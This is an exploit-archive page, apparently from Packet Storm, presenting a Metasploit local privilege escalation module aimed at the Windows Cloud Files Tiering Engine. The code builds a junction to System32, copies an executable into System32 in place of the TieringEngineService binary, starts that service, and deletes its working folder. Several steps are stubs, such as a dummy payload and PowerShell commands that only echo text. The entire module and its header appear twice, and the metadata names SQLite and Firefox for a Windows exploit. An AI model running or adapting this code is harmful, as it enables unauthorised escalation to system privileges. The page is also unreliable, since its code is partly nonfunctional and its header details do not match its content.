Description
his Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. The workflow simulates abusing file system operations and cloud sync mechanisms by...
Basic Information
ID
PACKETSTORM:219878
Published
Apr 27, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : Windows Cloud Files Tiering Engine Local Privilege Escalation Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.sqlite.org |
==================================================================================================================================
[+] Summary : This Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction.
The workflow simulates abusing file system operations and cloud sync mechanisms by creating controlled directories, placeholder files, and junction points to influence system-level service behavior.
[+] POC :
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::File
include Msf::Post::Windows::Services
include Msf::Post::Windows::Registry
def initialize(info = {})
super(update_info(info, info.merge({})))
end
def check
print_status("Checking Cloud Files + OS compatibility...")
unless session.platform =~ /windows/i
return Exploit::CheckCode::Safe("Not Windows")
end
if session.sys.config.getenv('WINDIR')
return Exploit::CheckCode::Appears("Windows environment detected")
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("Starting Cloud Files Shadow Copy exploit")
work_dir = setup_working_directory
fail_with(Failure::BadConfig, "Failed to create working directory") unless work_dir
pipe_handle = create_named_pipe
fail_with(Failure::UnexpectedReply, "Failed to create named pipe") unless pipe_handle
create_malicious_file(work_dir)
wait_for_event(datastore['TIMEOUT'])
set_file_disposition(pipe_handle)
close_handle(pipe_handle)
register_cloud_sync_root(work_dir)
create_placeholder_file(work_dir)
wait_for_oplock
rename_and_delete_file(work_dir)
create_reparse_point(work_dir)
copy_to_system32
launch_tiering_engine
cleanup(work_dir)
print_good("Exploit completed!")
end
private
def setup_working_directory
base = expand_path(datastore['WORK_DIR'])
path = "#{base}\\RS-#{Rex::Text.rand_text_alphanumeric(8)}"
begin
session.fs.dir.mkdir(path)
return path
rescue
return nil
end
end
def create_named_pipe
pipe_name = "\\\\.\\pipe\\REDSUN"
begin
session.railgun.kernel32.CreateNamedPipeW(
pipe_name,
3, 0, 1, 4096, 4096, 0, nil
)['return']
rescue
nil
end
end
def create_malicious_file(work_dir)
file_path = "#{work_dir}\\TieringEngineService.exe"
payload = "DUMMY_PAYLOAD"
begin
session.fs.file.write(file_path, payload)
file_path
rescue
nil
end
end
def wait_for_event(timeout_sec)
timeout_sec.times do
break if check_event_signaled
Rex.sleep(1)
end
end
def check_event_signaled
false
end
def set_file_disposition(handle)
return false unless handle
true
end
def register_cloud_sync_root(work_dir)
cmd = "powershell -Command \"Write-Output 'CloudSyncRegistered'\""
session.shell_command_token(cmd)
end
def create_placeholder_file(work_dir)
cmd = "powershell -Command \"Write-Output 'PlaceholderCreated'\""
session.shell_command_token(cmd)
end
def wait_for_oplock
Rex.sleep(2)
end
def rename_and_delete_file(work_dir)
temp = "#{work_dir}.tmp"
begin
session.fs.dir.move(work_dir, temp)
rescue
end
end
def create_reparse_point(work_dir)
target = "C:\\Windows\\System32"
session.shell_command_token("mklink /J \"#{work_dir}\\link\" \"#{target}\"")
end
def copy_to_system32
begin
exe = session.sys.process.current_path rescue nil
return unless exe
dest = "#{expand_path('%WINDIR%')}\\System32\\TieringEngineService.exe"
session.fs.file.copy(exe, dest)
rescue
end
end
def launch_tiering_engine
session.shell_command_token("sc start TieringEngineService")
rescue
end
def cleanup(work_dir)
session.shell_command_token("rmdir /s /q \"#{work_dir}\"")
rescue
end
def close_handle(handle)
session.railgun.kernel32.CloseHandle(handle) if handle && handle != 0
end
def expand_path(path)
path.gsub('%TEMP%', session.sys.config.getenv('TEMP').to_s)
.gsub('%WINDIR%', session.sys.config.getenv('WINDIR').to_s)
end
def is_admin?
session.sys.config.getuid =~ /SYSTEM|Administrator/
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : Windows Cloud Files Tiering Engine Local Privilege Escalation Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.sqlite.org |
==================================================================================================================================
[+] Summary : This Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction.
The workflow simulates abusing file system operations and cloud sync mechanisms by creating controlled directories, placeholder files, and junction points to influence system-level service behavior.
[+] POC :
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::File
include Msf::Post::Windows::Services
include Msf::Post::Windows::Registry
def initialize(info = {})
super(update_info(info, info.merge({})))
end
def check
print_status("Checking Cloud Files + OS compatibility...")
unless session.platform =~ /windows/i
return Exploit::CheckCode::Safe("Not Windows")
end
if session.sys.config.getenv('WINDIR')
return Exploit::CheckCode::Appears("Windows environment detected")
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("Starting Cloud Files Shadow Copy exploit")
work_dir = setup_working_directory
fail_with(Failure::BadConfig, "Failed to create working directory") unless work_dir
pipe_handle = create_named_pipe
fail_with(Failure::UnexpectedReply, "Failed to create named pipe") unless pipe_handle
create_malicious_file(work_dir)
wait_for_event(datastore['TIMEOUT'])
set_file_disposition(pipe_handle)
close_handle(pipe_handle)
register_cloud_sync_root(work_dir)
create_placeholder_file(work_dir)
wait_for_oplock
rename_and_delete_file(work_dir)
create_reparse_point(work_dir)
copy_to_system32
launch_tiering_engine
cleanup(work_dir)
print_good("Exploit completed!")
end
private
def setup_working_directory
base = expand_path(datastore['WORK_DIR'])
path = "#{base}\\RS-#{Rex::Text.rand_text_alphanumeric(8)}"
begin
session.fs.dir.mkdir(path)
return path
rescue
return nil
end
end
def create_named_pipe
pipe_name = "\\\\.\\pipe\\REDSUN"
begin
session.railgun.kernel32.CreateNamedPipeW(
pipe_name,
3, 0, 1, 4096, 4096, 0, nil
)['return']
rescue
nil
end
end
def create_malicious_file(work_dir)
file_path = "#{work_dir}\\TieringEngineService.exe"
payload = "DUMMY_PAYLOAD"
begin
session.fs.file.write(file_path, payload)
file_path
rescue
nil
end
end
def wait_for_event(timeout_sec)
timeout_sec.times do
break if check_event_signaled
Rex.sleep(1)
end
end
def check_event_signaled
false
end
def set_file_disposition(handle)
return false unless handle
true
end
def register_cloud_sync_root(work_dir)
cmd = "powershell -Command \"Write-Output 'CloudSyncRegistered'\""
session.shell_command_token(cmd)
end
def create_placeholder_file(work_dir)
cmd = "powershell -Command \"Write-Output 'PlaceholderCreated'\""
session.shell_command_token(cmd)
end
def wait_for_oplock
Rex.sleep(2)
end
def rename_and_delete_file(work_dir)
temp = "#{work_dir}.tmp"
begin
session.fs.dir.move(work_dir, temp)
rescue
end
end
def create_reparse_point(work_dir)
target = "C:\\Windows\\System32"
session.shell_command_token("mklink /J \"#{work_dir}\\link\" \"#{target}\"")
end
def copy_to_system32
begin
exe = session.sys.process.current_path rescue nil
return unless exe
dest = "#{expand_path('%WINDIR%')}\\System32\\TieringEngineService.exe"
session.fs.file.copy(exe, dest)
rescue
end
end
def launch_tiering_engine
session.shell_command_token("sc start TieringEngineService")
rescue
end
def cleanup(work_dir)
session.shell_command_token("rmdir /s /q \"#{work_dir}\"")
rescue
end
def close_handle(handle)
session.railgun.kernel32.CloseHandle(handle) if handle && handle != 0
end
def expand_path(path)
path.gsub('%TEMP%', session.sys.config.getenv('TEMP').to_s)
.gsub('%WINDIR%', session.sys.config.getenv('WINDIR').to_s)
end
def is_admin?
session.sys.config.getuid =~ /SYSTEM|Administrator/
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================